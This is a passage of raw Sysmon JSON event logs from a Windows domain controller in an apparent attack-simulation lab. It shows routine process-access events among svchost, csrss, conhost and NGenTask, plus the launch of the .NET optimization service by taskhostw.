C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6439,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6440,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6441,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6442,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6443,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6444,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.601\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-001060B80900}\r\nTargetProcessId: 4440\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.601","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-001060B80900}","TargetProcessId":"4440","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6445,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.617\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-001060B80900}\r\nSourceProcessId: 4440\r\nSourceThreadId: 1436\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-0010E0B70900}\r\nTargetProcessId: 3060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.617","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-001060B80900}","SourceProcessId":"4440","SourceThreadId":"1436","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-21BC-5F25-0000-0010E0B70900}","TargetProcessId":"3060","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6446,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:08.640\r\nProcessGuid: {41C8662E-21BC-5F25-0000-00104CBA0900}\r\nProcessId: 4644\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Microsoft .NET Framework optimization service\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: NGenTask.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:872\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=D4FCDD915CAA2B207531B145FD538E1A,SHA256=4279C50E5BF0F5F89358CA5BF1876827BF4D055DCE6BDBDEA56D4AD9F5047CCE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\r\nParentProcessGuid: {41C8662E-21BC-5F25-0000-0010EEAA0900}\r\nParentProcessId: 1824\r\nParentImage: C:\\Windows\\System32\\taskhostw.exe\r\nParentCommandLine: taskhostw.exe /RuntimeWide","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:03:08.640","ProcessGuid":"{41C8662E-21BC-5F25-0000-00104CBA0900}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Microsoft .NET Framework optimization service","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"NGenTask.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\" /RuntimeWide /StopEvent:872","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=D4FCDD915CAA2B207531B145FD538E1A,SHA256=4279C50E5BF0F5F89358CA5BF1876827BF4D055DCE6BDBDEA56D4AD9F5047CCE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","ParentProcessGuid":"{41C8662E-21BC-5F25-0000-0010EEAA0900}","ParentProcessId":"1824","ParentImage":"C:\\Windows\\System32\\taskhostw.exe","ParentCommandLine":"taskhostw.exe /RuntimeWide","EventReceivedTime":"2020-08-01 08:03:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
